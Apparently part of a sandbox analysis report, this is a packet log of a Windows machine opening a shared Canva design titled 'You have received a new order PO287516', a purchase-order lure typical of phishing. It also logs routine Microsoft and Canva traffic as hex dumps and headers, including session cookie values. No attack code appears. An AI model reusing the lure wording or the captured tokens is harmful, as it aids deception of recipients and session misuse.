                                                                                                                                                                                                                                                                    3192.168.2.1249721104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:27 UTC785OUTGET /design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:28 UTC1351INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:27 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950c0ed99c334-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Set-Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; Path=/; Max-Age=31536000; Expires=Thu, 20 Nov 2025 15:01:27 GMT; Secure; HttpOnly; SameSite=NONE
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    content-security-policy: base-uri 'self'; object-src 'none'; script-src 'report-sample' 'strict-dynamic' 'unsafe-eval' 'nonce-2O7DMHP2dkAfOcOTnCzHNw'; report-uri https://csp.canva.com/_cspreport?source=web2&requestId=8e5950c0ed99c334&app=design_viewer&policyHash=eb43d41c
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    content-security-policy: base-uri 'self'; object-src 'none'; script-src 'report-sample' 'strict-dynamic' 'unsafe-eval' 'nonce-2O7DMHP2dkAfOcOTnCzHNw'; report-uri https://csp.canva.com/_cspreport?source=web2&requestId=8e5950c0ed99c334&app=design_viewer&policyHash=eb43d41c
                                                                                                                                                                                                                                                                    2024-11-20 15:01:28 UTC1356INData Raw: 72 65 66 65 72 72 65 72 2d 70 6f 6c 69 63 79 3a 20 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a 78 2d 63 6f 6e 74 65 6e 74 2d 74 79 70 65 2d 6f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 78 2d 66 72 61 6d 65 2d 6f 70 74 69 6f 6e 73 3a 20 64 65 6e 79 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 65 35 39 35 30 63 30 65 64 39 39 63 33 33 34 0d 0a 78 2d 72 6f 62 6f 74 73 2d 74 61 67 3a 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 0d 0a 78 2d 78 73 73 2d 70 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63 66 43 61 63 68 65 53 74 61 74 75 73 3b 64 65 73 63 3d 22 44 59 4e 41 4d 49 43 22 0d 0a 52 65 70 6f 72 74
                                                                                                                                                                                                                                                                    Data Ascii: referrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-frame-options: denyx-request-id: 8e5950c0ed99c334x-robots-tag: noindex, nofollowx-xss-protection: 1; mode=blockServer-Timing: cfCacheStatus;desc="DYNAMIC"Report
                                                                                                                                                                                                                                                                    2024-11-20 15:01:28 UTC447INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 43 6f 46 75 46 63 32 4f 6c 76 2e 50 4c 7a 4e 5a 39 44 35 63 53 6f 6c 37 67 44 5f 31 6f 75 62 57 62 72 51 67 59 37 73 36 37 4d 45 2d 31 37 33 32 31 31 34 38 38 37 2d 31 2e 30 2e 31 2e 31 2d 36 76 75 68 53 77 46 46 49 4f 55 55 30 53 71 4a 65 59 4a 64 41 6d 5f 59 32 43 53 46 33 39 79 72 5a 38 6e 41 42 36 76 47 53 6b 6f 7a 4b 34 30 6c 73 53 74 78 5a 71 76 48 73 34 49 48 4b 5f 41 70 56 50 67 52 4e 5f 31 71 6a 50 6e 68 41 70 49 4f 44 77 31 65 7a 51 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 34 20 31 35 3a 33 31 3a 32 37 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; path=/; expires=Wed, 20-Nov-24 15:31:27 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                                    2024-11-20 15:01:28 UTC1369INData Raw: 36 33 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 74 68 65 6d 65 20 6c 69 67 68 74 20 63 6c 61 73 73 69 63 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 59 6f 75 20 68 61 76 65 20 72 65 63 65 69 76 65 64 20 61 20 6e 65 77 20 6f 72 64 65 72 20 50 4f 32 38 37 35 31 36 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 69 67 6e 5f 76 69 65 77 65 72 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69
                                                                                                                                                                                                                                                                    Data Ascii: 6391<!DOCTYPE html><html dir="ltr" lang="en" class="theme light classic"><head><meta charset="utf-8"><title>You have received a new order PO287516</title><meta name="app-name" content="design_viewer"/><meta name="viewport" content="width=device-width, i
                                                                                                                                                                                                                                                                    2024-11-20 15:01:28 UTC1369INData Raw: 30 30 62 61 2d 30 30 62 62 2c 75 2b 30 30 62 66 2c 75 2b 30 30 63 30 2d 30 30 64 36 2c 75 2b 30 30 64 38 2d 30 30 66 36 2c 75 2b 30 30 66 38 2d 30 31 34 38 2c 75 2b 30 31 34 61 2d 30 31 37 65 2c 75 2b 30 31 39 32 2c 75 2b 30 31 62 35 2d 30 31 62 36 2c 75 2b 30 31 66 63 2d 30 31 66 64 2c 75 2b 30 32 31 38 2d 30 32 31 62 2c 75 2b 30 32 33 37 2c 75 2b 30 32 63 36 2d 30 32 63 37 2c 75 2b 30 32 63 39 2c 75 2b 30 32 64 38 2d 30 32 64 64 2c 75 2b 31 65 38 30 2d 31 65 38 35 2c 75 2b 31 65 39 65 2c 75 2b 31 65 66 32 2d 31 65 66 33 2c 75 2b 32 30 33 30 2c 75 2b 32 30 33 39 2d 32 30 33 61 2c 75 2b 32 30 61 63 2c 75 2b 32 30 62 61 2c 75 2b 32 31 31 33 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 66 6f 6e 74 2d 66 61 6d 69
                                                                                                                                                                                                                                                                    Data Ascii: 00ba-00bb,u+00bf,u+00c0-00d6,u+00d8-00f6,u+00f8-0148,u+014a-017e,u+0192,u+01b5-01b6,u+01fc-01fd,u+0218-021b,u+0237,u+02c6-02c7,u+02c9,u+02d8-02dd,u+1e80-1e85,u+1e9e,u+1ef2-1ef3,u+2030,u+2039-203a,u+20ac,u+20ba,u+2113}@font-face{font-display:swap;font-fami
                                                                                                                                                                                                                                                                    2024-11-20 15:01:28 UTC1369INData Raw: 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 68 64 53 32 2f 46 6b 6c 66 67 4e 45 4d 42 69 39 51 59 76 53 47 31 48 70 75 52 48 38 65 39 61 6d 73 46 7a 53 61 5a 64 66 47 6e 58 68 41 63 36 39 48 73 77 52 7a 44 7a 51 31 5a 36 4d 39 42 49 4c 67 58 6d 56 4c 78 6c 41 31 47 6c 65 4a 32 50 6d 32 6c 43 55 4f 41 3d 3d 22 20 6e 6f 6e 63 65 3d 22 32 4f 37 44 4d 48 50 32 64 6b 41 66 4f 63 4f 54 6e 43 7a 48 4e 77 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 77 65 62 2f 61 64 39 32 33 31 65 64 36 37 30 36 66 61 64 66 2e 76 65 6e 64 6f 72 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 6c
                                                                                                                                                                                                                                                                    Data Ascii: " as="script" crossorigin="anonymous" integrity="sha512-hdS2/FklfgNEMBi9QYvSG1HpuRH8e9amsFzSaZdfGnXhAc69HswRzDzQ1Z6M9BILgXmVLxlA1GleJ2Pm2lCUOA==" nonce="2O7DMHP2dkAfOcOTnCzHNw"><link href="https://static.canva.com/web/ad9231ed6706fadf.vendor.js" rel="prel
                                                                                                                                                                                                                                                                    2024-11-20 15:01:28 UTC1369INData Raw: 20 63 6f 6e 74 65 6e 74 3d 22 31 30 32 34 22 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 35 37 36 22 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 6e 76 61 2e 63 6f 6d 2f 64 65 73 69 67 6e 2f 44 41 47 58 42 51 66 51 33 41 4d 2f 42 76 4f 39 56 39 37 76 56 33 51 6b 38 37 46 71 42 59 36 70 64 51 2f 76 69 65 77 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c
                                                                                                                                                                                                                                                                    Data Ascii: content="1024"/><meta property="og:image:height" content="576"/><meta property="og:url" content="https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view"><meta property="og:type" content="website"><meta name="twitter:card" content="summary_l
                                                                                                                                                                                                                                                                    2024-11-20 15:01:28 UTC1369INData Raw: 75 63 68 2d 31 38 30 78 31 38 30 2d 31 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 32 4f 37 44 4d 48 50 32 64 6b 41 66 4f 63 4f 54 6e 43 7a 48 4e 77 22 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 70 6c 61 63 65 28 27 61 64 61 70 74 69 76 65 27 2c 20 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 27 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 27 29 2e 6d 61 74 63 68 65 73 20 3f 20 27 64 61 72 6b 27 20 3a 20 27 6c 69 67 68 74 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69
                                                                                                                                                                                                                                                                    Data Ascii: uch-180x180-1.png" sizes="180x180"></head><body><script nonce="2O7DMHP2dkAfOcOTnCzHNw">document.documentElement.classList.replace('adaptive', window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light');</script><div id="root"></div><scri
                                                                                                                                                                                                                                                                    2024-11-20 15:01:28 UTC1369INData Raw: 3a 22 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 22 7d 2c 7b 22 41 22 3a 22 44 22 2c 22 42 22 3a 22 47 6f 6f 67 6c 65 20 46 69 72 65 62 61 73 65 20 41 6e 61 6c 79 74 69 63 73 22 7d 2c 7b 22 41 22 3a 22 44 22 2c 22 42 22 3a 22 47 6f 6f 67 6c 65 20 46 69 72 65 62 61 73 65 20 43 72 61 73 68 6c 79 74 69 63 73 22 7d 2c 7b 22 41 22 3a 22 44 22 2c 22 42 22 3a 22 47 6f 6f 67 6c 65 20 46 69 72 65 62 61 73 65 20 50 65 72 66 6f 72 6d 61 6e 63 65 22 7d 2c 7b 22 41 22 3a 22 44 22 2c 22 42 22 3a 22 47 6f 6f 67 6c 65 20 4f 70 74 69 6d 69 7a 65 22 7d 2c 7b 22 41 22 3a 22 44 22 2c 22 42 22 3a 22 48 6f 74 6a 61 72 22 7d 2c 7b 22 41 22 3a 22 44 22 2c 22 42 22 3a 22 49 6e 6e 6f 76 69 64 22 7d 2c 7b 22 41 22 3a 22 44 22 2c 22 42 22 3a 22 4c 69 76 65 52 61 6d 70 22 7d 2c
                                                                                                                                                                                                                                                                    Data Ascii: :"Google Analytics"},{"A":"D","B":"Google Firebase Analytics"},{"A":"D","B":"Google Firebase Crashlytics"},{"A":"D","B":"Google Firebase Performance"},{"A":"D","B":"Google Optimize"},{"A":"D","B":"Hotjar"},{"A":"D","B":"Innovid"},{"A":"D","B":"LiveRamp"},
                                                                                                                                                                                                                                                                    2024-11-20 15:01:28 UTC1369INData Raw: 76 61 2e 63 6f 6d 2f 5f 73 74 72 65 61 6d 22 2c 22 42 22 3a 7b 22 41 22 3a 22 41 41 4d 41 41 31 64 46 51 67 41 3d 22 2c 22 49 22 3a 22 55 41 41 41 41 41 41 41 41 41 41 22 2c 22 44 22 3a 22 42 41 41 41 41 41 41 41 41 41 41 22 2c 22 45 22 3a 22 65 6e 22 2c 22 46 22 3a 22 64 65 73 69 67 6e 5f 76 69 65 77 65 72 22 2c 22 47 22 3a 22 32 30 32 34 31 31 31 38 2d 32 31 22 2c 22 48 22 3a 22 34 61 61 61 63 63 33 22 7d 7d 2c 22 62 22 3a 7b 22 41 3f 22 3a 22 4e 22 2c 22 43 22 3a 7b 22 61 22 3a 22 57 45 42 22 7d 2c 22 44 22 3a 7b 22 61 22 3a 22 57 45 42 22 2c 22 62 22 3a 22 55 53 22 2c 22 63 22 3a 22 65 6e 22 2c 22 69 22 3a 22 66 32 30 62 39 30 65 63 2d 35 65 38 66 2d 34 62 62 36 2d 62 65 34 38 2d 34 35 31 38 32 39 65 65 62 65 63 30 22 7d 2c 22 45 22 3a 7b 22 57 4b 4c
                                                                                                                                                                                                                                                                    Data Ascii: va.com/_stream","B":{"A":"AAMAA1dFQgA=","I":"UAAAAAAAAAA","D":"BAAAAAAAAAA","E":"en","F":"design_viewer","G":"20241118-21","H":"4aaacc3"}},"b":{"A?":"N","C":{"a":"WEB"},"D":{"a":"WEB","b":"US","c":"en","i":"f20b90ec-5e8f-4bb6-be48-451829eebec0"},"E":{"WKL
                                                                                                                                                                                                                                                                    2024-11-20 15:01:28 UTC1369INData Raw: 42 22 3a 31 7d 2c 22 42 22 3a 7b 22 42 22 3a 2d 31 2e 31 33 36 38 36 38 33 37 37 32 31 36 31 36 30 33 45 2d 31 33 2c 22 44 22 3a 31 33 38 37 2e 35 38 39 39 32 34 34 33 37 33 33 32 2c 22 43 22 3a 37 32 30 2e 37 36 32 32 35 37 35 36 39 39 32 31 35 7d 7d 7d 7d 5d 7d 5d 7d 2c 22 51 22 3a 7b 22 41 22 3a 22 42 76 4f 39 56 39 37 76 56 33 51 6b 38 37 46 71 42 59 36 70 64 51 22 7d 2c 22 52 22 3a 22 48 22 2c 22 54 22 3a 7b 22 72 75 6c 65 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 55 53 45 52 22 2c 22 70 72 69 6e 63 69 70 61 6c 22 3a 7b 22 62 72 61 6e 64 22 3a 22 42 41 47 58 42 65 7a 35 6b 73 6f 22 2c 22 75 73 65 72 22 3a 22 55 41 47 58 42 57 5a 69 45 71 67 22 7d 2c 22 72 6f 6c 65 22 3a 22 4f 57 4e 45 52 22 7d 2c 7b 22 74 79 70 65 22 3a 22 44 45 46 41 55 4c 54 22 2c 22
                                                                                                                                                                                                                                                                    Data Ascii: B":1},"B":{"B":-1.1368683772161603E-13,"D":1387.589924437332,"C":720.7622575699215}}}}]}]},"Q":{"A":"BvO9V97vV3Qk87FqBY6pdQ"},"R":"H","T":{"rules":[{"type":"USER","principal":{"brand":"BAGXBez5kso","user":"UAGXBWZiEqg"},"role":"OWNER"},{"type":"DEFAULT","


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    4192.168.2.124972223.218.208.109443
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:29 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                    Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                                                                                                                                    2024-11-20 15:01:29 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                    X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=6277
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:29 GMT
                                                                                                                                                                                                                                                                    Content-Length: 55
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    X-CID: 2
                                                                                                                                                                                                                                                                    2024-11-20 15:01:29 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    5192.168.2.1249726104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:29 UTC582OUTGET /web/228115b6a6e5e8e3.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1349INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:30 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 5949
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950ce5a5d420a-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Age: 877333
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "9bfbe66ba889320c5f6dfc8325a43c40"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:16 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Fri, 25 Oct 2024 01:31:33 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sun, 26 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: tGY6yqJHEeFc0C1Mf/r3RVK1KwDaRtKXt05XDfqDwzm9KsBo2elZUWDqhNUeL9vXulxm/j9JLy0=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 5376NMTKVZRWRBA2
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: TeTHdyqWAZYiolq.kebQrh7OQMPh4zDX
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC777INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 59 75 4d 34 75 77 55 75 44 32 6f 4a 5f 48 66 57 4d 61 34 62 41 63 4e 46 43 61 42 67 39 48 68 79 70 74 6f 32 6b 52 62 2e 57 32 34 2d 31 37 33 32 31 31 34 38 39 30 2d 31 2e 30 2e 31 2e 31 2d 4a 45 36 76 70 4f 55 58 73 69 6f 62 4e 49 71 75 39 51 5a 5a 75 64 7a 64 79 7a 4e 45 6e 74 50 45 53 74 72 67 4a 71 66 73 38 36 42 57 38 74 62 70 51 44 62 73 61 57 79 47 43 66 38 6f 72 53 5a 2e 70 6f 73 70 47 5f 38 46 59 57 48 52 64 6c 51 61 65 79 37 78 5f 77 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 34 20 31 35 3a 33 31 3a 33 30 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=YuM4uwUuD2oJ_HfWMa4bAcNFCaBg9Hhypto2kRb.W24-1732114890-1.0.1.1-JE6vpOUXsiobNIqu9QZZudzdyzNEntPEStrgJqfs86BW8tbpQDbsaWyGCf8orSZ.pospG_8FYWHRdlQaey7x_w; path=/; expires=Wed, 20-Nov-24 15:31:30 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC612INData Raw: 2e 5f 39 34 50 34 74 41 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 74 68 65 6d 65 7b 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 76 61 72 28 2d 2d 34 68 2d 6d 5f 41 29 7d 2e 6c 69 67 68 74 7b 2d 2d 34 68 2d 6d 5f 41 3a 6c 69 67 68 74 3b 2d 2d 5a 70 61 2d 4b 41 3a 23 30 30 63 34 63 63 3b 2d 2d 65 47 56 62 6e 67 3a 23 38 62 33 64 66 66 3b 2d 2d 4d 35 5f 70 76 41 3a 23 37 37 33 31 64 38 3b 2d 2d 62 6f 4b 4b 57 67 3a 23 36 31 32 64 61 65 3b 2d 2d 6f 71 75 72 64 77 3a 72 67 62 61 28 36 34 2c 38 37 2c 31 30 39 2c 2e 30 37 29 3b 2d 2d 64 31 70 39 39 77 3a 23 66 66 66 3b 2d 2d 31 37 4c 66 48 77 3a 72 67 62 61 28 33 36 2c 34 39 2c 36 31 2c 2e 34 29 3b 2d 2d 45 67 57 67 66 67 3a 72 67 62 61 28 31 33 2c 31 38 2c 32 32 2c 30 29 3b 2d 2d 58 33 2d 2d 5a 67 3a 72 67 62 61
                                                                                                                                                                                                                                                                    Data Ascii: ._94P4tA{outline:none}.theme{color-scheme:var(--4h-m_A)}.light{--4h-m_A:light;--Zpa-KA:#00c4cc;--eGVbng:#8b3dff;--M5_pvA:#7731d8;--boKKWg:#612dae;--oqurdw:rgba(64,87,109,.07);--d1p99w:#fff;--17LfHw:rgba(36,49,61,.4);--EgWgfg:rgba(13,18,22,0);--X3--Zg:rgba
